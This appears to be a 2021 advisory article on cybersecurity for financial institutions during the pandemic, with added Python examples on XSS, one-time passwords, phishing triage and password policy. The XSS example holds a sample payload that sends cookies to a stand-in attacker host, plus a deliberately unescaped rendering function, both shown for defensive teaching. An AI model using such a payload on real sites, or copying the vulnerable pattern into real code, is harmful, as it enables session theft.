Author: RSBP CA
Date of publication: 17-03-2021

 

While cybersecurity and the risks posed by cybercrime have been growing priorities for financial institutions (FIs) for over two decades, the COVID-19 crisis has abruptly changed the game, forcing FIs to alter long-standing practices almost overnight and to adapt to new ways of operating and communicating.

Most FIs have been on a digital journey for some years now, with the goal of improving efficiency and leveraging technology to provide better financial services to clients. With the COVID-19 pandemic and the related containment measures, however, the digital agendas of many institutions have been unexpectedly accelerated or re-engineered under emergency conditions. The movement away from physical branches and towards mobile services and digital communication has become a necessity, and these changes in strategy have triggered, and will continue to trigger, new risk exposures and new practices at every level of an FI.

This new reality affects everyone who has had to follow home-confinement and social-distancing guidelines during the pandemic. Employees have had to shift to remote working without sufficient preparation or training in the limitations of, and changes required by, this way of working. As clients use new digital channels to access FI services during the emergency, new threats have emerged and new practices need to be established. For the institutions themselves, changes at the structural level are required to ensure that the new working models do not come at the cost of security.

Cyber-criminals’ arsenal

Cross-site scripting (XSS) attacks are exploits in which the attacker injects script into a page served by a legitimate website, so that the script runs in the victim's browser, with the site's privileges, when the page is loaded. The injected code can read session cookies or tokens, capture what is typed into a login form, or silently submit transactions on the victim's behalf. For financial institutions this is a significant risk, because the institution ends up being responsible (or at least perceived as responsible) for attacks delivered through its own site to its own clients.
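The following is an added example, not code from the original article, showing the bug described above in a server-rendered "search results" page beside the hardened version. The page fragment, the attacker payload and the URLs are constructed for illustration; the point is that escaping must match the output context (HTML text versus a link attribute), and that a Content-Security-Policy limits the damage when an escape is missed.

```python
# Added example, not from the original article: a reflected cross-site
# scripting (XSS) bug in a server-rendered page, beside the hardened version.
# The page layout, the attacker payload and the URLs are constructed for
# illustration; only the standard library is used.
import html
from urllib.parse import urlparse

# Constructed attacker input, as it might arrive in a ?q= search parameter.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_results_vulnerable(query: str) -> str:
    """Interpolates the user's query straight into HTML. Any markup in the
    query becomes part of the page and runs in the victim's browser."""
    return f"<h1>Results for: {query}</h1>"


def render_results_hardened(query: str) -> str:
    """Escapes the query for the HTML text context before interpolation, so
    '<', '>', '&' and quotes are displayed rather than parsed as markup."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def safe_href(url: str) -> str:
    """Escaping alone is not enough in a URL context: 'javascript:alert(1)'
    contains no HTML metacharacters but still executes from an href.
    Allow only http(s) links, then escape for the attribute context."""
    # Browsers strip ASCII tab/newline from URLs, so strip them before parsing
    # to stop 'java\nscript:' from slipping past the scheme check.
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    if urlparse(cleaned).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def security_headers() -> dict:
    """Defence in depth: a Content-Security-Policy that forbids inline script
    limits what an XSS bug can do even if an escape is missed somewhere."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def contains_script_tag(rendered: str) -> bool:
    """Crude check: does a live <script> tag survive in the rendered HTML?"""
    return "<script" in rendered.lower()
```

Templating engines that auto-escape by default (and are not switched off with a "safe" filter) do the text-context escaping for you; the scheme check in `safe_href` and the CSP header still have to be added deliberately.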

Distributed denial of service (DDoS) is a malicious attempt to disrupt the normal traffic of a targeted server, service or network by overwhelming it, or the infrastructure around it, with a flood of internet traffic, typically generated from many compromised devices at once.

Phishing is the sending of emails that impersonate a trusted institution in order to gather personally identifiable information such as passwords, bank account details or social security numbers, usually by luring the recipient to a fake website, or in order to infect the target's computer. Some phishing campaigns are aimed specifically at FI employees, with the goal of getting them to open an attachment or click on a link that redirects them to a fake login page where they are encouraged to enter their credentials. Once a cyber-criminal gains access to an employee's email account, (s)he will be able to:

  • Send emails on behalf of the employee
  • Gain access to customer financial information
  • Access critical company information
  • Reset passwords on other services that use that mailbox for account recovery

Ransomware attacks are carried out with malicious software designed to deny access to a computer system or its data, typically by encrypting files, until a ransom is paid. Many current ransomware operations also steal data before encrypting it and threaten to publish it, so restoring from backup does not by itself end the incident. Such an attack on a financial institution can cause direct monetary loss as well as operational disruption and reputational damage.

Cyber threats are not new. However, amid the global COVID-19 pandemic, the increased number of people working from home and/or using digital channels for banking has created an ideal environment for cybercrime to thrive and for cybercriminals to use the weapons at their disposal more aggressively.

Working from home and employee protection

The pandemic has triggered a sudden and rapid increase in employees working from home, as well as an urgent need to provide digital banking services to clients of financial institutions. While cyber threats are not new, amid the global pandemic, cybersecurity-related risks have significantly increased. In particular, the following are key cybersecurity-related challenges:

  1. Exposure to cybercrime for employees working from home
  2. Deployment of secured digital channels for banking service provision
  3. FI ability to detect and respond to cyber threats

While working in an office environment, employees usually operate under company policies that include cybersecurity controls such as rules on device set-up, firewall protection, internal network access controls and regular anti-virus updates. When working from home, employees are outside that secured environment and often operate over less secure Wi-Fi networks and on devices that are not set up according to the company's policy controls, which makes them more vulnerable to cyber-attacks; phishing and social engineering are the attacks employees at home are most likely to face. Normally, when an employee requires remote access, appropriate training and secured devices are provided first. With the sudden and large increase in demand for remote access, however, it is likely that adequate protection has not been applied to all of it.

Remote Access to Software

Financial institutions should treat all remote access as medium to high risk and adopt the following approaches for securing it:

  • Multi-factor authentication for all remote user access, as passwords alone are easily compromised. Where the choice exists, phishing-resistant methods such as hardware security keys are preferable to codes sent by SMS.

The new standard: multi-factor authentication

Multi-factor authentication is one of the most effective controls you can implement to prevent unauthorized access to computers, applications and online services. Using multiple layers of authentication makes it much harder to access your systems.

Criminals might manage to steal one type of proof of identity (for example, your PIN), but it is much harder to obtain the correct combination of several proofs for any given account. It is not impossible: real-time phishing proxies can relay a one-time code the victim types in, which is why hardware security keys are preferred for high-risk access.

Multi-factor authentication can use a combination of:

  • Something the user knows (a passphrase or PIN; answers to "secret questions" are a weak form of this factor, since they are often guessable or publicly discoverable)
  • Something the user physically possesses (such as a card, token, security key or an authenticator app on a registered phone)
  • Something the user inherently is (such as a fingerprint or retina pattern)

Within the past five years, multi-factor authentication has gone from a measure reserved for high-security systems to the baseline expectation for any online actor.
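As an added example, not code from the original article, the following implements the "something the user possesses" factor that authenticator apps provide: a time-based one-time password (TOTP, RFC 6238) built on HOTP (RFC 4226), with a verifier that tolerates one step of clock drift. `DEMO_SECRET` is the reference secret from the RFC test vectors and is used only so the results can be checked; a real deployment generates a random secret per user.

```python
# Added example, not from the original article: the time-based one-time
# password (TOTP, RFC 6238) that authenticator apps generate, built on HOTP
# (RFC 4226) with only the standard library. DEMO_SECRET is the reference
# secret from the RFCs' test vectors; a real deployment generates a random
# secret per user with secrets.token_bytes(20) and stores it encrypted.
import base64
import hashlib
import hmac
import struct
import time

DEMO_SECRET = b"12345678901234567890"  # RFC test-vector secret, not for real use


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based OTP: HMAC-SHA1 over the 8-byte big-endian counter,
    dynamically truncated to 31 bits, then reduced to `digits` digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at=None, step: int = 30, digits: int = 6) -> str:
    """TOTP is HOTP with the counter set to the number of `step`-second
    intervals since the Unix epoch (`at` overrides the clock for testing)."""
    now = int(time.time()) if at is None else at
    return hotp(secret, now // step, digits)


def verify_totp(secret: bytes, code: str, at=None, step: int = 30,
                digits: int = 6, window: int = 1) -> bool:
    """Accepts the code for the current interval or `window` intervals either
    side (clock drift), comparing in constant time. A production verifier
    must also remember the last accepted counter per user and reject reuse,
    and rate-limit attempts, since a 6-digit code has only a million values."""
    now = int(time.time()) if at is None else at
    counter = now // step
    for delta in range(-window, window + 1):
        if hmac.compare_digest(hotp(secret, counter + delta, digits), code):
            return True
    return False


def provisioning_uri(issuer: str, account: str, secret: bytes) -> str:
    """The otpauth:// URI that is shown as a QR code during enrolment."""
    b32 = base64.b32encode(secret).decode().rstrip("=")
    return (f"otpauth://totp/{issuer}:{account}?secret={b32}&issuer={issuer}"
            f"&algorithm=SHA1&digits=6&period=30")


if __name__ == "__main__":
    print("current code for the demo secret:", totp(DEMO_SECRET))
    print(provisioning_uri("ExampleBank", "alice", DEMO_SECRET))
```

The verification window should stay at one step: every extra step of tolerance multiplies the number of codes an attacker can guess in a given moment.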

  • Strong password policies should be in place. Length matters more than character-class rules: a minimum of six characters, still a common setting, is far too short to resist offline guessing. Require a minimum length of at least 12 characters (longer passphrases are better), check new passwords against lists of common and previously breached passwords, and reject passwords containing the institution's name, the user's name or other easily guessed words.
  • Corporate virtual private networks (VPNs) should be used instead of exposing Remote Desktop Protocol (RDP) directly to the internet; internet-facing RDP is a frequent entry point for ransomware operators. Restricting remote access to an MFA-protected VPN, and within it to only the systems each role needs, significantly reduces the attack surface.
  • Employee-owned computers not provided by the FI should only be connected if they adhere to the FI's policy on anti-virus and anti-spyware software and patching, and have the required security settings applied in web browsers.

What makes an antivirus solution “good”

  1. High detection rate of viruses and other malicious software:
    • Zero-day attacks (malware taking advantage of security flaws before they are patched)
    • Malware, spyware and viruses
    • Trojans and worms
    • Phishing scams, including those sent via email
  2. Fast scanning engine, allowing users to clean their computers in a short amount of time
  3. Minimal impact on computer performance
  4. Simple, easy-to-use interface

Antivirus suites take the hard work off your hands by providing automatic protection against a host of threats, but they are one layer of defence and do not replace patching, multi-factor authentication and user awareness.

  • Home Wi-Fi connections should use a current security protocol (WPA2 at a minimum, WPA3 where the router supports it), the default administrator user names and passwords on home networking equipment, such as Wi-Fi routers, should be changed, and router firmware should be kept up to date.

Good Practices for virtual meetings

Remote working has increased reliance on video and audio-conferencing applications, and these tools are increasingly targeted by cybercriminals. Financial institutions should configure them to limit unauthorised access, establish corporate policies for virtual meeting security, and make sure that employees are given guidance on using the tools securely when they meet with colleagues and clients.

  • All meetings must require an access code or password
  • Do not share meeting IDs on social media unless meeting is intended to be open to the public
  • Limit the reuse of access codes to prevent uninvited eavesdroppers, as codes might have been shared with former employees or past clients 
  • For sensitive topics, use one-time PINs or meeting IDs, and consider multi-factor authentication for joining the meeting
  • Use a waiting room for participants who log in before a meeting starts, and only allow the host to start a meeting
  • Play a tone when attendees join and ask new attendees to identify themselves
  • If available, use a dashboard to monitor attendees, and identify all generic attendees
  • Do not record the meeting unless it is necessary 
  • If it is a web meeting (with video), remind participants not to share sensitive information

Measures for data loss prevention

Employees may be using unauthorised personal accounts and applications, such as personal email accounts or file-sharing services, to get work done. FIs should remind employees of the following:

  • Avoid sending email correspondence from corporate mail accounts to private mail accounts
  • Use only company-approved USB devices on computers used for work
  • Designate how and where sensitive information should be stored: on approved, encrypted external media, the institution's centralised file server or an approved cloud-based service, and never in personal accounts
  • Make daily backup copies of all valuable information residing on your device. Backups are crucial to minimise the impact if data is lost, corrupted, encrypted by malware or stolen
  • Ask employees to keep work devices for professional use only and lock their devices when they step away from them. An innocent activity on a work computer could lead to a breach

Reaching clients through digital channels

Digital channels and products have become critical for FIs to interact with, engage with, and offer banking services to their clients as the entire sector steers through the uncertainty arising from the pandemic. There has been a spike in the deployment of digital products and channels by financial institutions, mainly on the following technologies and platforms:

  • Mobile apps
  • Chatbots
  • Internet banking

These channels are open and available to the public, allowing anyone to download or reach them. Once registered for a service, a user can immediately use it for interactions or transactions. These digital banking channels give the client convenience and control, but at the same time FIs need to guard against vulnerabilities in such public-facing systems that could be used to orchestrate a cyber-attack.

The urgency of deploying a mobile app should not come at the expense of appropriate security. Each of the above digital channels has its own characteristics, described below, and requires specific security considerations.

Mobile apps

Mobile banking apps are the preferred digital channel for many clients, owing to the proliferation of mobile devices. Mobile apps allow customers to carry out most banking activities without visiting a branch, including checking account balances, transferring funds, paying bills, viewing statements, managing cards directly and reaching customer support. In the years before COVID-19, the number of users transacting on mobile apps had been growing at a phenomenal rate, surpassing the number transacting at branches in many countries. Amidst the pandemic, mobile apps have experienced a further surge in usage.

With an increase in popularity comes increased cyber risk. There are three areas within the mobile technology chain where attackers may exploit vulnerabilities to launch a malicious attack, namely the device, the network and the data centre. Device-based attacks target the mobile device itself, exploiting a vulnerability on the device to orchestrate a cyber-attack. For example, an attack can be initiated through phishing or a drive-by download, where a visit to a website triggers the download of malicious code without the user's knowledge. Network-based attacks, on the other hand, exploit the network through which the mobile device is connected. For example, an app that does not encrypt its data exchange, when used on an unsecured Wi-Fi network, runs the risk of that data being intercepted by an attacker eavesdropping on the network; a banking app should use TLS for all of its traffic and validate the server certificate properly. Data centre attacks target web servers and databases, with the attacker exploiting vulnerabilities in the operating systems or application components running on the web server, which is why timely patching of that back end matters as much as the app itself.

Chatbots

Chatbots have been around for a while but are still new to many users. For FIs, chatbots are a highly beneficial technology for daily interaction with customers, with the capability of integrating AI-powered technology into customer interactions. How this technology is used in the financial sector should be in line with the regulations of the sector, protecting customer information from third parties, including the operator of the messaging platform the chatbot runs on.

Financial institutions are now deploying chatbots on social media channels such as WhatsApp, Telegram, Viber and Facebook Messenger, with a range of banking services such as account balance checks, funds transfers, viewing mini statements, customer onboarding and the paying of bills.

Internet Banking

Internet banking has been around and evolving for decades. It offers customers an easy way to monitor their finances, allowing them to view payments, check account balances, update personal information and access other banking services online via a secured website. This easy access makes internet banking a common target for hackers and other cyber criminals. Understanding the security issues related to internet banking can help both FIs and clients to stay safe from intruders. The key to addressing vulnerabilities in internet banking is adhering to the guidelines for digital channels listed below.

Securing digital channels

  • Ensure the user's identity is verified before any requested information is provided. Two-step verification, for example a one-time password (OTP) sent by SMS or a confirmation link sent to a registered email address, is one process that can be used, bearing in mind that SMS OTPs can be intercepted through SIM-swap fraud and should not be the only control for high-value transactions
  • Utilise a biometric authentication process to secure chatbots
  • Ensure communication between chatbots and users is encrypted. WhatsApp, Telegram and Facebook Messenger all offer end-to-end encryption for some conversations, but check what each platform actually guarantees for business or bot traffic: on several platforms end-to-end encryption applies only to person-to-person chats, and bot messages are protected only between the client and the platform's servers. Encryption in transit prevents third-party interception but does not protect a device that is already compromised at the user's end
  • Chatbots can permanently delete conversations between them and users. Enable and set a time frame for the deletion of conversations containing sensitive data on the chatbot
  • Mobile banking apps should, at a minimum, be developed to the same security standard as any other software the institution exposes to the internet, and be security-tested before each release
  • The Open Web Application Security Project (OWASP) provides a comprehensive Mobile Security Testing Guide, together with the companion Mobile Application Security Verification Standard (MASVS) that defines the requirements it tests. The guide can be downloaded from the link below and should serve as a checklist for testing a mobile app for vulnerabilities and applying the needed recommendations: https://owasp.org/www-project-mobile-security-testing-guide/
  • Use only official apps from the platform's app store. Apps from the official store are less likely to contain malware, and clients should be warned that the FI's app is never distributed by email or SMS link
  • Keep the apps on your mobile phone updated. When a vulnerability is found in an app, the vendor usually ships the fix as an update; keeping your apps and phone software updated ensures maximum protection

Adapting the organisation to the new challenges

In an era of increased usage of digital channels and technological transformation, together with intensified use of cloud services and broader networking capabilities, the threat landscape continues to expand. Threat actors will try to attack operational systems and backup capabilities simultaneously and in highly sophisticated ways, potentially leading to enterprise-wide destructive cyber-attacks.

FIs can improve their defence mechanisms and attack readiness by maintaining good cyber hygiene, setting up and maintaining a current incident response strategy and response architecture, and implementing cyber recovery solutions to mitigate the impact of cyber-attacks.

Good cyber hygiene is a reference to the practices and steps that financial institutions and their employees take to maintain system health and improve online security. Regular implementation of a few key practices can dramatically improve the security of any system:

  • Provide employees with regular communication and awareness messages, including basic security knowledge:
    • Beware of phishing, especially COVID-19 scams and fraudulent COVID-19 websites
    • Know working from home “DOs & DON’Ts”
    • Ensure home Wi-Fi is secure
    • Always use VPN on public Wi-Fi
  • Create a shared channel called #phishing-attacks or an email address to which suspicious emails are forwarded
  • Identify critical financial workers in order to ensure undisrupted availability of services for customers
  • Review contingency plans to address the COVID-19 pandemic
  • Update your company’s Acceptable Use Policy to address working from home and the use of home computer assets
  • Identify functions that can only be undertaken in a secured environment at the office (i.e. not remotely)
  • Review and adapt disaster recovery plans to the current context
  • Provide protective technology on endpoints (hardening, anti-virus, endpoint detection and response, etc.)
  • Enforce software updates
  • Utilise a password manager or run password audits
  • Provide VPN access and disable split tunneling
  • Enable multi-factor authentication everywhere, especially on email accounts

Practical steps for a secure environment

The main lever for reducing these threats is a high degree of awareness among employees and, where possible, clients. Several tools can be used for this purpose:

Awareness seminars, where the subject is discussed among employees or clients, including sharing the experience of those who have been subject to an attack. These seminars should be aimed at refreshing employees' knowledge of minimum requirements regarding information security:

Email security, to ensure staff know how to keep their emails secure

  • Avoid opening emails, downloading attachments, or clicking on suspicious links sent from unknown or untrusted sources
  • Verify unexpected attachments or links from people you know by contacting them through another method of communication like a phone call or text message
  • Do not provide personal information to unknown sources like passwords, birthdates, and especially, social security numbers
  • Be especially cognizant of emails with poor design, grammar or spelling, as this can be a sign of a phishing attempt; note, however, that well-crafted phishing emails are common, so the absence of such errors is no guarantee
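The following is an added example, not code from the original article, that turns the email indicators listed here and in the "Cyber-criminals' arsenal" section into a triage check an FI could run on forwarded messages before a human looks at them. It flags a display name that claims the institution's brand while the sender domain does not belong to it, a lookalike sender domain, a link whose visible text shows one address but points elsewhere, links to raw IP addresses, and pressure or credential-harvesting language. `TRUSTED_DOMAINS`, the phrase list and both sample messages are constructed for illustration (192.0.2.10 is a documentation-range address).

```python
# Added example, not from the original article: heuristic triage of an
# incoming email for the phishing indicators listed above. TRUSTED_DOMAINS and
# both messages are constructed for illustration; 192.0.2.10 is a
# documentation-range address, not a real host.
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"bank.example"}  # assumed: the institution's own domain(s)
PRESSURE_PHRASES = ("verify your account", "suspended", "urgent",
                    "confirm your password", "covid")

SAMPLE_PHISH = """\
From: "Bank Security Team" <security@bank-example.support>
To: employee@bank.example
Subject: URGENT: verify your account within 24 hours
Content-Type: text/html

<p>Due to COVID-19 measures your account has been suspended.
Restore access here: <a href="http://192.0.2.10/login">https://bank.example/login</a></p>
"""

SAMPLE_LEGIT = """\
From: "Alice Jones" <alice.jones@bank.example>
To: employee@bank.example
Subject: Notes from today's team meeting
Content-Type: text/html

<p>The notes are on the <a href="https://intranet.bank.example/notes">intranet</a>.</p>
"""

_LINK_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)
_IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def _is_trusted(host: str) -> bool:
    return host in TRUSTED_DOMAINS or any(host.endswith("." + d) for d in TRUSTED_DOMAINS)


def analyse(raw_message: str) -> list:
    """Returns human-readable findings; an empty list means no indicator fired."""
    msg = message_from_string(raw_message)
    findings = []

    # 1. Sender: display name claims the brand, or the domain merely resembles it.
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    brand_tokens = {d.split(".")[0] for d in TRUSTED_DOMAINS}
    if not _is_trusted(domain):
        if any(tok in name.lower() for tok in brand_tokens):
            findings.append(f"display name '{name}' claims the brand but sender domain is {domain}")
        if any(tok in domain for tok in brand_tokens):
            findings.append(f"lookalike sender domain {domain}")

    # 2. Links: visible URL text that differs from the real target, raw IP targets.
    body = (msg.get_payload(decode=True) or b"").decode("utf-8", "replace")
    for href, text in _LINK_RE.findall(body):
        href_host = (urlparse(href).hostname or "").lower()
        text_host = urlparse(text.strip()).hostname if "://" in text else None
        if text_host and text_host.lower() != href_host:
            findings.append(f"link text shows {text_host} but points to {href_host}")
        if _IPV4_RE.fullmatch(href_host):
            findings.append(f"link points to a raw IP address {href_host}")

    # 3. Pressure or credential-harvesting language in subject or body.
    haystack = (msg.get("Subject", "") + " " + body).lower()
    hits = [p for p in PRESSURE_PHRASES if p in haystack]
    if hits:
        findings.append("pressure/credential language: " + ", ".join(hits))
    return findings


def is_suspicious(raw_message: str, threshold: int = 2) -> bool:
    """Two or more independent indicators: route to the reporting channel for review."""
    return len(analyse(raw_message)) >= threshold


if __name__ == "__main__":
    for label, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(label, is_suspicious(sample), analyse(sample))
```

These heuristics are a first filter, not a verdict: a message with no findings can still be a well-crafted phish, which is why the advice to verify unexpected requests through a second channel stands regardless of what a tool reports.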

Password protection

  • Enforce the use of strong passwords on all corporate user accounts
  • Avoid easy-to-guess words like names of pets, children, and spouses as well as common dates like birthdays
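As an added example, not code from the original article, the check below enforces the password points made here and in the remote-access section: a meaningful minimum length, no common or previously seen passwords (including "leet" spellings such as P@ssw0rd), no institution or personal words such as names of pets, children and spouses, and no keyboard sequences or years that stand in for birthdays. `COMMON_PASSWORDS` and `INSTITUTION_WORDS` are small constructed lists; a real deployment loads a large breached-password list and the FI's own terms.

```python
# Added example, not from the original article: a password-policy check that
# enforces length and guessability rules rather than a six-character
# composition rule. COMMON_PASSWORDS and INSTITUTION_WORDS are constructed
# placeholders for a breached-password list and the FI's own terms.
import re
import unicodedata

MIN_LENGTH = 12
COMMON_PASSWORDS = {"password", "123456", "qwerty", "welcome1", "letmein", "summer2020"}
INSTITUTION_WORDS = {"bank", "fintech"}  # assumed: add the FI's name, products, city
KEYBOARD_ROWS = ("qwertyuiop", "asdfghjkl", "zxcvbnm",
                 "0123456789", "abcdefghijklmnopqrstuvwxyz")
_LEET = str.maketrans("@4$5!10|3", "aassilole")  # p@ssw0rd -> password


def fold(pw: str) -> str:
    """Unicode-normalise and lower-case so lookalike spellings compare equal."""
    return unicodedata.normalize("NFKC", pw).lower()


def has_sequence(s: str, run: int = 4) -> bool:
    """True if any `run` consecutive characters walk a keyboard row, the
    alphabet or the digits, forwards or backwards (e.g. 'qwer', '4321')."""
    for i in range(len(s) - run + 1):
        chunk = s[i:i + run]
        if any(chunk in row or chunk in row[::-1] for row in KEYBOARD_ROWS):
            return True
    return False


def check_password(pw: str, user_words=()) -> list:
    """Returns the policy violations for `pw` (empty list = acceptable).
    `user_words` are per-user terms to block: user name, family names, pets."""
    low = fold(pw)
    deleet = low.translate(_LEET)  # fold digit/symbol substitutions for word checks
    problems = []
    if len(pw) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    for common in COMMON_PASSWORDS:
        if common in low or common in deleet:
            problems.append(f"contains the common password '{common}'")
            break
    blocked = set(INSTITUTION_WORDS) | {fold(w) for w in user_words}
    for word in sorted(blocked):
        if len(word) >= 3 and (word in low or word in deleet):
            problems.append(f"contains the guessable word '{word}'")
    if has_sequence(low):
        problems.append("contains a sequential or keyboard pattern")
    if re.search(r"(.)\1\1", low):
        problems.append("repeats a character three or more times")
    if re.search(r"(19|20)\d\d", low):
        problems.append("contains a year, as in a birthday or anniversary")
    return problems


if __name__ == "__main__":
    for candidate in ("Summer2020!", "P@ssw0rd1234", "correct horse battery staple"):
        print(repr(candidate), check_password(candidate, user_words=("Alice",)))
```

Run at password-change time, a check like this replaces the "6 characters with mixed case" rule with one that actually raises the cost of guessing; pair it with MFA, since no password policy protects a credential that has been phished.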

Web safety

  • Make sure that any website that asks for account credentials such as usernames and passwords, or is used to conduct financial transactions, is served over HTTPS with a valid certificate, so that data is encrypted in transit. Such sites show a padlock in the browser's address bar and their address begins with "https". Note that the padlock only confirms an encrypted connection to whoever operates that domain; phishing sites routinely use HTTPS too, so always check that the domain name itself is the institution's genuine domain
  • While FI employees are working remotely, ensure that they do not use public computers or public Wi-Fi connections to log into accounts and access sensitive information
  • Sign out of accounts and shut down computers and mobile devices when not in use

Device maintenance 

  • Keep all hardware and software updated with the latest, patched version
  • Run company-approved antivirus or anti-malware applications on all devices and keep them updated with the latest version
  • Create multiple, redundant backups of all critical and sensitive data on a daily basis and keep them stored off the network (offline, or otherwise unreachable from the production environment) so that a ransomware infection or other destructive malware incident cannot encrypt or delete them; test restoring from them regularly, since an untested backup is only a hope of recovering lost files

Phishing simulations, which consist of sending test phishing emails that redirect recipients who click to a page explaining the issue and what the consequences would have been had this been a genuine attack

Technology training, to be used when new technologies are implemented to ensure that procedures are well understood and that the limitations and dangers of using new technologies are clear for users

Information access and distribution. Centralising all communication materials that the FI is going to use in crisis management in one place is a good way to make sure that the right information reaches the right employees at the right time. Employee communication platforms (intranets), as well as regular daily emails, can be used for the timely communication of all necessary information.

COVID-19, a catalyst for digital transformation

The COVID-19 crisis has brought about significant change in perceptions towards and the application of remote working and alternative channels in a short timeframe. The ripples of these changes will impact financial institutions for years to come and will influence the shape of a different world: a seamless world in which all channels are used by all types of clients for different purposes, a world in which financial services offered are the same whether you use your mobile or go to a branch. While the COVID-19 crisis did not create these technologies or approaches, the crisis has been a catalyst and an accelerant, creating both the opportunity and necessity for financial institutions to establish today the digital practices and procedures that will be required tomorrow.